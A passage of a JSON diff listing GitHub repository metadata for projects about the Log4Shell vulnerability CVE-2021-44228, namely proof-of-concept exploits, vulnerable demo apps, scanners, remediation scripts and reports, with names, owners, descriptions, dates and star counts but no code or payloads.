"2022-01-13T13:46:12Z", + "updated_at": "2022-01-13T13:46:52Z", + "pushed_at": "2022-01-13T14:43:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 447754863, + "name": "log4j_github_repository", + "full_name": "sdogancesur\/log4j_github_repository", + "owner": { + "login": "sdogancesur", + "id": 34608448, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34608448?v=4", + "html_url": "https:\/\/github.com\/sdogancesur", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sdogancesur\/log4j_github_repository", + "description": "This work includes testing and improvement tools for CVE-2021-44228(log4j).", + "fork": false, + "created_at": "2022-01-13T21:16:26Z", + "updated_at": "2023-05-29T16:42:26Z", + "pushed_at": "2022-01-15T18:52:17Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 448039430, + "name": "Search-log4Jvuln-AppScanSTD", + "full_name": "jrocia\/Search-log4Jvuln-AppScanSTD", + "owner": { + "login": "jrocia", + "id": 69405400, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69405400?v=4", + "html_url": "https:\/\/github.com\/jrocia", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jrocia\/Search-log4Jvuln-AppScanSTD", + "description": "This Pwsh script run AppScan Standard scans against a list of web sites (URLs.txt) checking for Log4J (CVE-2021-44228) vulnerability", + "fork": false, + "created_at": "2022-01-14T16:47:20Z", + "updated_at": "2022-01-14T16:54:21Z", + "pushed_at": "2022-01-14T18:34:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 448612058, + "name": "log4stdin", + "full_name": "aajuvonen\/log4stdin", + "owner": { + "login": "aajuvonen", + "id": 97843492, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97843492?v=4", + "html_url": "https:\/\/github.com\/aajuvonen", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aajuvonen\/log4stdin", + "description": "A Java application intentionally vulnerable to CVE-2021-44228", + "fork": false, + "created_at": "2022-01-16T16:39:19Z", + "updated_at": "2022-04-02T16:13:36Z", + "pushed_at": "2023-03-17T09:09:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-44228", + "log4shell", + "vulnerable-application" + ], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 448890655, + "name": "PS-CVE-2021-44228", + "full_name": "arnaudluti\/PS-CVE-2021-44228", + "owner": { + "login": "arnaudluti", + "id": 41639163, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41639163?v=4", + "html_url": "https:\/\/github.com\/arnaudluti", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/arnaudluti\/PS-CVE-2021-44228", + "description": "Static detection of vulnerable log4j librairies on Windows servers, members of an AD domain.", + "fork": false, + "created_at": "2022-01-17T12:46:20Z", + "updated_at": "2022-01-19T08:30:13Z", + "pushed_at": "2022-01-19T08:31:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 449417650, + "name": "CVE-2021-44228-Log4Shell-POC", + "full_name": "ColdFusionX\/CVE-2021-44228-Log4Shell-POC", + "owner": { + "login": "ColdFusionX", + "id": 8522240, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8522240?v=4", + "html_url": "https:\/\/github.com\/ColdFusionX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ColdFusionX\/CVE-2021-44228-Log4Shell-POC", + "description": "POC for Infamous Log4j CVE-2021-44228", + "fork": false, + "created_at": "2022-01-18T19:22:38Z", + "updated_at": "2024-08-12T20:19:51Z", + "pushed_at": "2022-01-20T15:28:58Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-44228", + "jndi-exploit", + "jndi-lookups", + "ldap", + "log4j", + "log4j2", + "log4shell", + "poc", + "rce" + ], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 450033114, + "name": "cve-2021-44228-waf-tests", + "full_name": "robrankin\/cve-2021-44228-waf-tests", + "owner": { + "login": "robrankin", + "id": 1881181, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1881181?v=4", + "html_url": "https:\/\/github.com\/robrankin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/robrankin\/cve-2021-44228-waf-tests", + "description": "Testing WAF protection against CVE-2021-44228 Log4Shell", + "fork": false, + "created_at": "2022-01-20T09:30:44Z", + "updated_at": "2023-08-24T16:30:43Z", + "pushed_at": "2022-01-20T12:29:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 452823928, + "name": "log4j-polkit-poc", + "full_name": "0xalwayslucky\/log4j-polkit-poc", + "owner": { + "login": "0xalwayslucky", + "id": 28390940, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28390940?v=4", + "html_url": "https:\/\/github.com\/0xalwayslucky", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xalwayslucky\/log4j-polkit-poc", + "description": "vulnerable setup to display an attack chain of log4j CVE-2021-44228 with privilege escalation to root using the polkit exploit CVE-2021-4034", + "fork": false, + "created_at": "2022-01-27T19:54:16Z", + "updated_at": "2022-01-29T06:29:58Z", + "pushed_at": "2022-01-28T15:08:53Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 453952325, + "name": "yLog4j", + "full_name": "y-security\/yLog4j", + "owner": { + "login": "y-security", + "id": 86777723, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86777723?v=4", + "html_url": "https:\/\/github.com\/y-security", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/y-security\/yLog4j", + "description": "PortSwigger Burp Plugin for the Log4j (CVE-2021-44228)", + "fork": false, + "created_at": "2022-01-31T09:54:19Z", + "updated_at": "2023-05-02T06:58:40Z", + "pushed_at": "2022-01-31T10:23:27Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 458405084, + "name": "Log4Shell", + "full_name": "FeryaelJustice\/Log4Shell", + "owner": { + "login": "FeryaelJustice", + "id": 47835172, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47835172?v=4", + "html_url": "https:\/\/github.com\/FeryaelJustice", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FeryaelJustice\/Log4Shell", + "description": "This repository is for Log4j 2021 (CVE-2021-44228) Vulnerability demonstration and mitigation.", + "fork": false, + "created_at": "2022-02-12T03:02:24Z", + "updated_at": "2022-02-12T03:02:24Z", + "pushed_at": "2022-02-12T04:11:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 458500087, + "name": "CVE-2021-44228-white-box", + "full_name": "hotpotcookie\/CVE-2021-44228-white-box", + "owner": { + "login": "hotpotcookie", + "id": 68333318, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68333318?v=4", + "html_url": "https:\/\/github.com\/hotpotcookie", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hotpotcookie\/CVE-2021-44228-white-box", + "description": "Log4j vulner testing environment based on CVE-2021-44228. It provide guidance to build the sample infrastructure and the exploit scripts. Supporting cooki3 script as the main exploit tools & integration", + "fork": false, + "created_at": "2022-02-12T11:19:41Z", + "updated_at": "2024-04-28T06:08:38Z", + "pushed_at": "2023-09-06T11:47:42Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "badusb", + "cooki3", + "cve-2021-44228", + "java", + "ldap-authentication", + "log4j2", + "log4shell", + "penetration-testing", + "ptes" + ], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 459806805, + "name": "l4srs", + "full_name": "s-retlaw\/l4srs", + "owner": { + "login": "s-retlaw", + "id": 73955369, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73955369?v=4", + "html_url": "https:\/\/github.com\/s-retlaw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/s-retlaw\/l4srs", + "description": "Rust implementation of the Log 4 Shell (log 4 j - CVE-2021-44228)", + "fork": false, + "created_at": "2022-02-16T01:13:08Z", + "updated_at": "2022-02-16T01:21:29Z", + "pushed_at": "2023-01-14T19:59:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 463165453, + "name": "Log-4j-scanner", + "full_name": "Ananya-0306\/Log-4j-scanner", + "owner": { + "login": "Ananya-0306", + "id": 74227338, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74227338?v=4", + "html_url": "https:\/\/github.com\/Ananya-0306", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ananya-0306\/Log-4j-scanner", + "description": "A fully automated, accurate, and extensive scanner for finding log4j RCE CVE-2021-44228", + "fork": false, + "created_at": "2022-02-24T13:49:14Z", + "updated_at": "2024-09-06T22:37:21Z", + "pushed_at": "2022-03-04T13:30:17Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bugbounty", + "cybersecurity", + "fork-for-contribution", + "log4j", + "open-source", + "trending-repositories" + ], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 467749739, + "name": "log4shellwithlog4j2_13_3", + "full_name": "paulvkitor\/log4shellwithlog4j2_13_3", + "owner": { + "login": "paulvkitor", + "id": 101220344, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101220344?v=4", + "html_url": "https:\/\/github.com\/paulvkitor", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/paulvkitor\/log4shellwithlog4j2_13_3", + "description": "Springboot web application accepts a name get parameter and logs its value to log4j2. Vulnerable to CVE-2021-44228.", + "fork": false, + "created_at": "2022-03-09T02:29:58Z", + "updated_at": "2022-03-09T04:11:03Z", + "pushed_at": "2022-03-09T04:11:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 468389206, + "name": "vulescanjndilookup", + "full_name": "MiguelM001\/vulescanjndilookup", + "owner": { + "login": "MiguelM001", + "id": 22323920, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22323920?v=4", + "html_url": "https:\/\/github.com\/MiguelM001", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MiguelM001\/vulescanjndilookup", + "description": "HERRAMIENTA AUTOMATIZADA PARA LA DETECCION DE LA VULNERABILIDAD CVE-2021-44228", + "fork": false, + "created_at": "2022-03-10T14:57:30Z", + "updated_at": "2022-03-10T15:56:57Z", + "pushed_at": "2022-03-11T17:49:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 468746734, + "name": "CVE-2021-44228", + "full_name": "Jun-5heng\/CVE-2021-44228", + "owner": { + "login": "Jun-5heng", + "id": 88525975, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88525975?v=4", + "html_url": "https:\/\/github.com\/Jun-5heng", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jun-5heng\/CVE-2021-44228", + "description": "Log4j2组件命令执行RCE \/ Code By:Jun_sheng", + "fork": false, + "created_at": "2022-03-11T12:43:15Z", + "updated_at": "2022-03-11T13:24:13Z", + "pushed_at": "2022-03-11T13:24:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 469576160, + "name": "CVE-2021-44228", + "full_name": "honypot\/CVE-2021-44228", + "owner": { + "login": "honypot", + "id": 101309325, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101309325?v=4", + "html_url": "https:\/\/github.com\/honypot", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/honypot\/CVE-2021-44228", + "description": null, + "fork": false, + "created_at": "2022-03-14T04:09:36Z", + "updated_at": "2022-03-14T04:09:57Z", + "pushed_at": "2022-03-14T04:10:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 469576898, + "name": "CVE-2021-44228-vuln-app", + "full_name": "honypot\/CVE-2021-44228-vuln-app", + "owner": { + "login": "honypot", + "id": 101309325, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101309325?v=4", + "html_url": "https:\/\/github.com\/honypot", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/honypot\/CVE-2021-44228-vuln-app", + "description": null, + "fork": false, + "created_at": "2022-03-14T04:13:13Z", + "updated_at": "2022-03-14T04:13:24Z", + "pushed_at": "2022-03-14T04:16:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 482498767, + "name": "log4j-scanner", + "full_name": "manishkanyal\/log4j-scanner", + "owner": { + "login": "manishkanyal", + "id": 39938426, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39938426?v=4", + "html_url": "https:\/\/github.com\/manishkanyal", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/manishkanyal\/log4j-scanner", + "description": "A Log4j vulnerability scanner is used to identify the CVE-2021-44228 and CVE_2021_45046", + "fork": false, + "created_at": "2022-04-17T11:01:24Z", + "updated_at": "2022-11-10T04:02:56Z", + "pushed_at": "2022-04-17T11:27:22Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 487163916, + "name": "Writing-Sample-1", + "full_name": "TPower2112\/Writing-Sample-1", + "owner": { + "login": "TPower2112", + "id": 20917633, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20917633?v=4", + "html_url": "https:\/\/github.com\/TPower2112", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TPower2112\/Writing-Sample-1", + "description": "CVE-2021-44228 Log4j Summary", + "fork": false, + "created_at": "2022-04-30T02:35:38Z", + "updated_at": "2022-12-15T00:15:39Z", + "pushed_at": "2022-11-19T19:37:19Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-44228", + "log4j2", + "markdown", + "mitigations" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 487921535, + "name": "Log4j-Exploit-CVE-2021-44228", + "full_name": "Willian-2-0-0-1\/Log4j-Exploit-CVE-2021-44228", + "owner": { + "login": "Willian-2-0-0-1", + "id": 39037497, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39037497?v=4", + "html_url": "https:\/\/github.com\/Willian-2-0-0-1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Willian-2-0-0-1\/Log4j-Exploit-CVE-2021-44228", + "description": null, + "fork": false, + "created_at": "2022-05-02T16:53:26Z", + "updated_at": "2022-05-02T16:53:26Z", + "pushed_at": "2022-05-14T13:18:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 490330900, + "name": "Log4Shell-obfuscated-payloads-generator", + "full_name": "r3kind1e\/Log4Shell-obfuscated-payloads-generator", + "owner": { + "login": "r3kind1e", + "id": 85721156, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/85721156?v=4", + "html_url": "https:\/\/github.com\/r3kind1e", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r3kind1e\/Log4Shell-obfuscated-payloads-generator", + "description": "Generate primary obfuscated or secondary obfuscated CVE-2021-44228 or CVE-2021-45046 payloads to evade WAF detection.", + "fork": false, + "created_at": "2022-05-09T15:02:29Z", + "updated_at": "2024-07-16T09:47:08Z", + "pushed_at": "2022-05-26T03:18:31Z", + "stargazers_count": 21, + "watchers_count": 21, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-44228", + "cve-2021-45046", + "log4j", + "log4shell", + "vulnerability-research", + "waf-bypass" + ], + "visibility": "public", + "forks": 2, + "watchers": 21, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 491872919, + "name": "CVE-2021-44228", + "full_name": "Phineas09\/CVE-2021-44228", + "owner": { + "login": "Phineas09", + "id": 40483676, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40483676?v=4", + "html_url": "https:\/\/github.com\/Phineas09", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Phineas09\/CVE-2021-44228", + "description": "Log4Shell Proof-Of-Concept derived from https:\/\/github.com\/kozmer\/log4j-shell-poc", + "fork": false, + "created_at": "2022-05-13T11:35:22Z", + "updated_at": "2022-05-13T11:40:56Z", + "pushed_at": "2022-05-13T16:49:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 496048138, + "name": "CVE-2021-44228-Apache-Log4j-Rce", + "full_name": "yuuki1967\/CVE-2021-44228-Apache-Log4j-Rce", + "owner": { + "login": "yuuki1967", + "id": 11524508, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11524508?v=4", + "html_url": "https:\/\/github.com\/yuuki1967", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yuuki1967\/CVE-2021-44228-Apache-Log4j-Rce", + "description": null, + "fork": false, + "created_at": "2022-05-25T01:56:14Z", + "updated_at": "2022-05-25T01:56:32Z", + "pushed_at": "2023-05-26T05:20:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 500852820, + "name": "tf-log4j-aws-poc", + "full_name": "moshuum\/tf-log4j-aws-poc", + "owner": { + "login": "moshuum", + "id": 1893265, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1893265?v=4", + "html_url": "https:\/\/github.com\/moshuum", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/moshuum\/tf-log4j-aws-poc", + "description": "This project files demostrate a proof-of-concept of log4j vulnerability (CVE-2021-44228) on AWS using Terraform Infrastructure-as-a-code means.", + "fork": false, + "created_at": "2022-06-07T13:30:37Z", + "updated_at": "2022-06-07T23:24:00Z", + "pushed_at": "2022-06-08T04:14:11Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 501054329, + "name": "CVE-2021-44228", + "full_name": "jaehnri\/CVE-2021-44228", + "owner": { + "login": "jaehnri", + "id": 30930799, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30930799?v=4", + "html_url": "https:\/\/github.com\/jaehnri", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jaehnri\/CVE-2021-44228", + "description": "Proof of concept of the Log4Shell vulnerability (CVE-2021-44228)", + "fork": false, + "created_at": "2022-06-08T01:09:28Z", + "updated_at": "2023-06-01T16:45:21Z", + "pushed_at": "2022-07-07T03:35:14Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 502589993, + "name": "Log4Shell-CVE-2021-44228-Demo", + "full_name": "ra890927\/Log4Shell-CVE-2021-44228-Demo", + "owner": { + "login": "ra890927", + "id": 48157503, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48157503?v=4", + "html_url": "https:\/\/github.com\/ra890927", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ra890927\/Log4Shell-CVE-2021-44228-Demo", + "description": "Log4Shell CVE-2021-44228 Demo", + "fork": false, + "created_at": "2022-06-12T10:57:07Z", + "updated_at": "2022-12-11T13:51:49Z", + "pushed_at": "2022-06-13T02:37:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "docker", + "log4shell" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 515491317, + "name": "Ethical-Hacking-Report-Log4j", + "full_name": "vidrez\/Ethical-Hacking-Report-Log4j", + "owner": { + "login": "vidrez", + "id": 36509217, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36509217?v=4", + "html_url": "https:\/\/github.com\/vidrez", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vidrez\/Ethical-Hacking-Report-Log4j", + "description": ":page_with_curl: A report about CVE-2021-44228", + "fork": false, + "created_at": "2022-07-19T08:03:05Z", + "updated_at": "2024-04-29T17:22:54Z", + "pushed_at": "2022-07-19T08:08:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 520582575, + "name": "CVE-2021-44228", + "full_name": "vino-theva\/CVE-2021-44228", + "owner": { + "login": "vino-theva", + "id": 106059311, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106059311?v=4", + "html_url": "https:\/\/github.com\/vino-theva", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vino-theva\/CVE-2021-44228", + "description": "Apache Log4j is a logging tool written in Java. This paper focuses on what is Log4j and log4shell vulnerability and how it works, how it affects the victim, and how can this be mitigated", + "fork": false, + "created_at": "2022-08-02T17:03:55Z", + "updated_at": "2022-08-02T17:03:55Z", + "pushed_at": "2022-08-02T17:12:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 526103436, + "name": "tharindudh-Log4j-Vulnerability-in-Ghidra-tool-CVE-2021-44228", + "full_name": "tharindudh\/tharindudh-Log4j-Vulnerability-in-Ghidra-tool-CVE-2021-44228", + "owner": { + "login": "tharindudh", + "id": 71964544, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71964544?v=4", + "html_url": "https:\/\/github.com\/tharindudh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tharindudh\/tharindudh-Log4j-Vulnerability-in-Ghidra-tool-CVE-2021-44228", + "description": null, + "fork": false, + "created_at": "2022-08-18T07:27:32Z", + "updated_at": "2022-08-18T07:27:32Z", + "pushed_at": "2022-08-18T07:30:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 529025141, + "name": "jankybank", + "full_name": "eurogig\/jankybank", + "owner": { + "login": "eurogig", + "id": 9045562, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9045562?v=4", + "html_url": "https:\/\/github.com\/eurogig", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/eurogig\/jankybank", + "description": "Simple Java Front and Back end with bad log4j version featuring CVE-2021-44228", + "fork": false, + "created_at": "2022-08-25T21:35:32Z", + "updated_at": "2022-08-25T21:37:58Z", + "pushed_at": "2024-03-12T11:22:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 533987858, + "name": "Log4j-CVE-2021-44228-Remediation", + "full_name": "digital-dev\/Log4j-CVE-2021-44228-Remediation", + "owner": { + "login": "digital-dev", + "id": 18492599, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18492599?v=4", + "html_url": "https:\/\/github.com\/digital-dev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/digital-dev\/Log4j-CVE-2021-44228-Remediation", + "description": "This powershell script is intended to be used by anyone looking to remediate the Log4j Vulnerability within their environment. It can target multiple machines and run remotely as a job on all or only affected devices.", + "fork": false, + "created_at": "2022-09-08T00:22:57Z", + "updated_at": "2022-09-08T00:23:02Z", + "pushed_at": "2024-01-26T02:09:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 539366249, + "name": "log4j-shell-poc", + "full_name": "ocastel\/log4j-shell-poc", + "owner": { + "login": "ocastel", + "id": 3749321, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3749321?v=4", + "html_url": "https:\/\/github.com\/ocastel", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ocastel\/log4j-shell-poc", + "description": "A Proof-Of-Concept for the CVE-2021-44228 vulnerability. ", + "fork": false, + "created_at": "2022-09-21T07:43:15Z", + "updated_at": "2022-09-21T09:04:17Z", + "pushed_at": "2022-09-21T14:45:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 539674997, + "name": "CVE-2021-44228-poc", + "full_name": "bcdunbar\/CVE-2021-44228-poc", + "owner": { + "login": "bcdunbar", + "id": 8393928, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8393928?v=4", + "html_url": "https:\/\/github.com\/bcdunbar", + "user_view_type": "public" + }, + "html_url": 